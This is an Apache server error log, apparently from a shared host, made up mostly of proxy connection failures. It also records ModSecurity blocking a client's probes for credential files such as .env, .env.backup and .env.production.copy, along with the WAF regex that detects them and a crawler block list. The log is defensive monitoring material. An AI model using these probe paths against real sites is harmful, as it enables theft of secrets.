[Tue May 26 16:32:33.909836 2026] [proxy_http:error] [pid 808625:tid 808825] [client 207.241.173.38:27404] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:33.910400 2026] [proxy:error] [pid 808625:tid 808825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:33.910431 2026] [proxy_http:error] [pid 808625:tid 808825] [client 207.241.173.38:27404] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:33.914665 2026] [proxy:error] [pid 808625:tid 808786] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:33.914735 2026] [proxy_http:error] [pid 808625:tid 808786] [client 207.241.173.38:27416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:33.915358 2026] [proxy:error] [pid 808625:tid 808786] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:33.915392 2026] [proxy_http:error] [pid 808625:tid 808786] [client 207.241.173.38:27416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.203108 2026] [proxy:error] [pid 808625:tid 808871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.203173 2026] [proxy_http:error] [pid 808625:tid 808871] [client 207.241.173.38:27498] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.203282 2026] [proxy:error] [pid 808625:tid 808844] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.203326 2026] [proxy_http:error] [pid 808625:tid 808844] [client 207.241.173.38:27650] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.203934 2026] [proxy:error] [pid 808625:tid 808774] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.204018 2026] [proxy_http:error] [pid 808625:tid 808774] [client 207.241.173.38:27644] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.204261 2026] [proxy:error] [pid 808625:tid 808761] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.204351 2026] [security2:error] [pid 808625:tid 808781] [client 207.241.173.38:27426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahV9yjEl_SBaWibfDmpTXQAAABo"]
[Tue May 26 16:32:34.204368 2026] [proxy_http:error] [pid 808625:tid 808761] [client 207.241.173.38:27672] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.204531 2026] [proxy:error] [pid 808625:tid 808837] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.204590 2026] [proxy_http:error] [pid 808625:tid 808837] [client 207.241.173.38:27614] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.204702 2026] [proxy:error] [pid 808625:tid 808844] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.204737 2026] [proxy_http:error] [pid 808625:tid 808844] [client 207.241.173.38:27650] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.204979 2026] [security2:error] [pid 808625:tid 808758] [client 207.241.173.38:27406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahV9yjEl_SBaWibfDmpTYAAAAAM"]
[Tue May 26 16:32:34.205070 2026] [proxy:error] [pid 808625:tid 808774] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.205116 2026] [proxy_http:error] [pid 808625:tid 808774] [client 207.241.173.38:27644] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.205275 2026] [proxy:error] [pid 808625:tid 808761] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.205318 2026] [proxy_http:error] [pid 808625:tid 808761] [client 207.241.173.38:27672] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.205547 2026] [proxy:error] [pid 808625:tid 808874] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.205638 2026] [proxy_http:error] [pid 808625:tid 808874] [client 207.241.173.38:27674] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.205961 2026] [proxy:error] [pid 808625:tid 808755] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.205998 2026] [proxy_http:error] [pid 808625:tid 808755] [client 207.241.173.38:27422] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.206113 2026] [proxy:error] [pid 808625:tid 808757] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.206165 2026] [proxy_http:error] [pid 808625:tid 808757] [client 207.241.173.38:27622] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.206259 2026] [proxy:error] [pid 808625:tid 808781] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.206299 2026] [proxy_http:error] [pid 808625:tid 808781] [client 207.241.173.38:27688] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.207019 2026] [security2:error] [pid 808625:tid 808875] [client 207.241.173.38:27450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahV9yjEl_SBaWibfDmpTUwAAAHg"]
[Tue May 26 16:32:34.207532 2026] [proxy:error] [pid 808625:tid 808837] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.207571 2026] [proxy_http:error] [pid 808625:tid 808837] [client 207.241.173.38:27614] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.207704 2026] [proxy:error] [pid 808625:tid 808762] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.207757 2026] [proxy_http:error] [pid 808625:tid 808762] [client 207.241.173.38:27670] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.207853 2026] [proxy:error] [pid 808625:tid 808755] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.207890 2026] [proxy_http:error] [pid 808625:tid 808755] [client 207.241.173.38:27422] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.207987 2026] [proxy:error] [pid 808625:tid 808846] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.208034 2026] [proxy_http:error] [pid 808625:tid 808846] [client 207.241.173.38:27548] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.208132 2026] [proxy:error] [pid 808625:tid 808871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.208166 2026] [proxy_http:error] [pid 808625:tid 808871] [client 207.241.173.38:27498] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.208256 2026] [proxy:error] [pid 808625:tid 808757] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.208290 2026] [proxy_http:error] [pid 808625:tid 808757] [client 207.241.173.38:27622] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.208385 2026] [proxy:error] [pid 808625:tid 808819] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.208426 2026] [proxy_http:error] [pid 808625:tid 808819] [client 207.241.173.38:27508] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.208536 2026] [proxy:error] [pid 808625:tid 808853] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.208573 2026] [proxy_http:error] [pid 808625:tid 808853] [client 207.241.173.38:27588] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.208676 2026] [proxy:error] [pid 808625:tid 808879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.208718 2026] [proxy_http:error] [pid 808625:tid 808879] [client 207.241.173.38:27580] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.208803 2026] [proxy:error] [pid 808625:tid 808880] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.208854 2026] [proxy_http:error] [pid 808625:tid 808880] [client 207.241.173.38:27630] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.208952 2026] [security2:error] [pid 808625:tid 808859] [client 207.241.173.38:27434] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahV9yjEl_SBaWibfDmpTbgAAAGg"]
[Tue May 26 16:32:34.209023 2026] [proxy:error] [pid 808625:tid 808809] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.209075 2026] [proxy_http:error] [pid 808625:tid 808809] [client 207.241.173.38:27520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.209324 2026] [proxy:error] [pid 808625:tid 808827] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.209397 2026] [proxy_http:error] [pid 808625:tid 808827] [client 207.241.173.38:27562] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.209527 2026] [proxy:error] [pid 808625:tid 808762] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.209576 2026] [proxy_http:error] [pid 808625:tid 808762] [client 207.241.173.38:27670] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.209673 2026] [proxy:error] [pid 808625:tid 808797] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.209711 2026] [proxy_http:error] [pid 808625:tid 808797] [client 207.241.173.38:27542] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.209814 2026] [proxy:error] [pid 808625:tid 808809] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.209853 2026] [proxy_http:error] [pid 808625:tid 808809] [client 207.241.173.38:27520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.209940 2026] [proxy:error] [pid 808625:tid 808819] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.209975 2026] [proxy_http:error] [pid 808625:tid 808819] [client 207.241.173.38:27508] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.210069 2026] [proxy:error] [pid 808625:tid 808800] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.210118 2026] [proxy_http:error] [pid 808625:tid 808800] [client 207.241.173.38:27572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.210209 2026] [proxy:error] [pid 808625:tid 808855] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.210247 2026] [proxy_http:error] [pid 808625:tid 808855] [client 207.241.173.38:27658] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.210335 2026] [proxy:error] [pid 808625:tid 808853] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.210371 2026] [proxy_http:error] [pid 808625:tid 808853] [client 207.241.173.38:27588] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.210578 2026] [proxy:error] [pid 808625:tid 808781] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.210629 2026] [proxy_http:error] [pid 808625:tid 808781] [client 207.241.173.38:27688] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.210717 2026] [proxy:error] [pid 808625:tid 808879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.210757 2026] [proxy_http:error] [pid 808625:tid 808879] [client 207.241.173.38:27580] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.210847 2026] [proxy:error] [pid 808625:tid 808874] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.210894 2026] [proxy_http:error] [pid 808625:tid 808874] [client 207.241.173.38:27674] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.211079 2026] [proxy:error] [pid 808625:tid 808880] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.211166 2026] [proxy_http:error] [pid 808625:tid 808880] [client 207.241.173.38:27630] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.211262 2026] [proxy:error] [pid 808625:tid 808765] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.211306 2026] [proxy_http:error] [pid 808625:tid 808765] [client 207.241.173.38:27534] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.211415 2026] [proxy:error] [pid 808625:tid 808846] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.211466 2026] [proxy_http:error] [pid 808625:tid 808846] [client 207.241.173.38:27548] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.211575 2026] [proxy:error] [pid 808625:tid 808827] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.211617 2026] [proxy_http:error] [pid 808625:tid 808827] [client 207.241.173.38:27562] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.211702 2026] [proxy:error] [pid 808625:tid 808771] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.211739 2026] [proxy_http:error] [pid 808625:tid 808771] [client 207.241.173.38:27480] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.211884 2026] [proxy:error] [pid 808625:tid 808838] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.211968 2026] [proxy_http:error] [pid 808625:tid 808838] [client 207.241.173.38:27482] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.212064 2026] [proxy:error] [pid 808625:tid 808797] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.212101 2026] [proxy_http:error] [pid 808625:tid 808797] [client 207.241.173.38:27542] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.212188 2026] [proxy:error] [pid 808625:tid 808800] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.212224 2026] [proxy_http:error] [pid 808625:tid 808800] [client 207.241.173.38:27572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.212308 2026] [proxy:error] [pid 808625:tid 808771] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.212340 2026] [proxy_http:error] [pid 808625:tid 808771] [client 207.241.173.38:27480] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.212427 2026] [proxy:error] [pid 808625:tid 808811] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.212466 2026] [proxy_http:error] [pid 808625:tid 808811] [client 207.241.173.38:27598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.212560 2026] [proxy:error] [pid 808625:tid 808855] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.212597 2026] [proxy_http:error] [pid 808625:tid 808855] [client 207.241.173.38:27658] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.212690 2026] [proxy:error] [pid 808625:tid 808765] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.212725 2026] [proxy_http:error] [pid 808625:tid 808765] [client 207.241.173.38:27534] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.213096 2026] [proxy:error] [pid 808625:tid 808838] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.213152 2026] [proxy_http:error] [pid 808625:tid 808838] [client 207.241.173.38:27482] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.213246 2026] [proxy:error] [pid 808625:tid 808811] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.213285 2026] [proxy_http:error] [pid 808625:tid 808811] [client 207.241.173.38:27598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.213462 2026] [proxy:error] [pid 808625:tid 808792] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.213505 2026] [proxy_http:error] [pid 808625:tid 808792] [client 207.241.173.38:27466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:34.214089 2026] [proxy:error] [pid 808625:tid 808792] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:34.214125 2026] [proxy_http:error] [pid 808625:tid 808792] [client 207.241.173.38:27466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:35.836071 2026] [proxy:error] [pid 808625:tid 808809] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:35.836176 2026] [proxy_http:error] [pid 808625:tid 808809] [client 207.241.173.38:27426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:35.836853 2026] [proxy:error] [pid 808625:tid 808809] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:35.836934 2026] [proxy_http:error] [pid 808625:tid 808809] [client 207.241.173.38:27426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:36.138832 2026] [security2:error] [pid 808625:tid 808880] [client 185.191.171.6:51142] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahV9zDEl_SBaWibfDmpTkgAAAH0"]
[Tue May 26 16:32:36.138992 2026] [security2:error] [pid 808625:tid 808880] [client 185.191.171.6:51142] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahV9zDEl_SBaWibfDmpTkgAAAH0"]
[Tue May 26 16:32:36.217844 2026] [security2:error] [pid 808625:tid 808787] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9yzEl_SBaWibfDmpThQAAACA"]
[Tue May 26 16:32:37.311886 2026] [security2:error] [pid 808625:tid 808866] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9zDEl_SBaWibfDmpTowAAAG8"]
[Tue May 26 16:32:37.607031 2026] [security2:error] [pid 808625:tid 808848] [client 207.241.173.38:27406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahV9zTEl_SBaWibfDmpTuQAAAF0"]
[Tue May 26 16:32:37.607404 2026] [proxy:error] [pid 808625:tid 808768] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:37.607463 2026] [proxy_http:error] [pid 808625:tid 808768] [client 207.241.173.38:27434] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:37.607614 2026] [proxy:error] [pid 808625:tid 808805] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:37.607690 2026] [proxy_http:error] [pid 808625:tid 808805] [client 207.241.173.38:27450] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:37.608073 2026] [proxy:error] [pid 808625:tid 808768] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:37.608109 2026] [proxy_http:error] [pid 808625:tid 808768] [client 207.241.173.38:27434] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:37.608302 2026] [proxy:error] [pid 808625:tid 808805] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:37.608333 2026] [proxy_http:error] [pid 808625:tid 808805] [client 207.241.173.38:27450] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.319437 2026] [security2:error] [pid 808625:tid 808780] [client 207.241.173.38:27748] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahV9zjEl_SBaWibfDmpTywAAABk"]
[Tue May 26 16:32:38.319762 2026] [proxy:error] [pid 808625:tid 808842] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.319812 2026] [proxy_http:error] [pid 808625:tid 808842] [client 207.241.173.38:27758] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.320344 2026] [proxy:error] [pid 808625:tid 808835] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.320443 2026] [proxy_http:error] [pid 808625:tid 808835] [client 207.241.173.38:27708] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.320552 2026] [proxy:error] [pid 808625:tid 808842] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.320589 2026] [proxy_http:error] [pid 808625:tid 808842] [client 207.241.173.38:27758] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.320917 2026] [proxy:error] [pid 808625:tid 808853] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.320970 2026] [proxy_http:error] [pid 808625:tid 808853] [client 207.241.173.38:27720] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.321275 2026] [proxy:error] [pid 808625:tid 808835] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.321344 2026] [proxy_http:error] [pid 808625:tid 808835] [client 207.241.173.38:27708] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.321872 2026] [proxy:error] [pid 808625:tid 808853] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.321918 2026] [proxy_http:error] [pid 808625:tid 808853] [client 207.241.173.38:27720] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.322123 2026] [proxy:error] [pid 808625:tid 808781] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.322195 2026] [proxy_http:error] [pid 808625:tid 808781] [client 207.241.173.38:27704] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.322800 2026] [proxy:error] [pid 808625:tid 808781] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
